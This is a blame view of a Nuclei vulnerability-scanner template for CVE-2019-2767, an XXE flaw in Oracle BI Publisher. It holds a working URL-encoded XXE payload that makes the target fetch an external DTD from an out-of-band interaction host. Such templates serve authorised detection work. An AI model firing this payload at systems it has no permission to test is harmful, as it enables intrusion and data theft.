daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-2767.yaml

24 lines
1018 B
YAML
Raw Normal View History

Create CVE-2019-2767.yaml
2021-06-08 16:19:35 +00:00
id: CVE-2019-2767
info:
minor update
2021-06-08 19:53:13 +00:00
name: Oracle Business Intelligence - Publisher XXE
Create CVE-2019-2767.yaml
2021-06-08 16:19:35 +00:00
author: madrobot
severity: high
minor update
2021-06-08 19:53:13 +00:00
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
Create CVE-2019-2767.yaml
2021-06-08 16:19:35 +00:00
tags: cve,cve2019,oracle,xxe,oob
requests:
Update CVE-2019-2767.yaml
2021-06-08 16:22:58 +00:00
- raw:
- |
Update CVE-2019-2767.yaml
2021-06-08 16:29:59 +00:00
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Update CVE-2019-2767.yaml
2021-06-08 16:22:58 +00:00
Host: {{Hostname}}
Create CVE-2019-2767.yaml
2021-06-08 16:19:35 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"